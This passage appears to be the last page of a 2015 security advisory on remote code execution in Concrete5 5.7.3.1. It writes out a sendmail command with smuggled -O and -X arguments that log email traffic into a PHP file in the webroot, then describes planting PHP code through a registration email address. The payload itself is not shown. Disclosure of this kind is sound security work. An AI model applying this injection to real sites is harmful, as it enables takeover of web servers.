</html>
  • 4. RCE via Sendmail in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/3 When the victim user will browse to this page, the Public Registration Settings will be modified in a way that when a new user will be registered the following command line will be executed to send out a notification email (in case sendmail is used): /usr/sbin/sendmail -t –i –f a@b.com -OQueueDirectory=/tmp -X /var/www/concrete5/updates/test.php This will log all the email traffic into a test.php file located within the /updates/ directory of the Concrete5 webroot (which should be writable by the user running the web server). So the next step for the attacker is to register a new account and put some malicious PHP code after the email address, something like this: When the new account will be created a notification email will be sent, thus the attacker can browse to http://[host]/updates/test.php in order to execute the injected PHP code: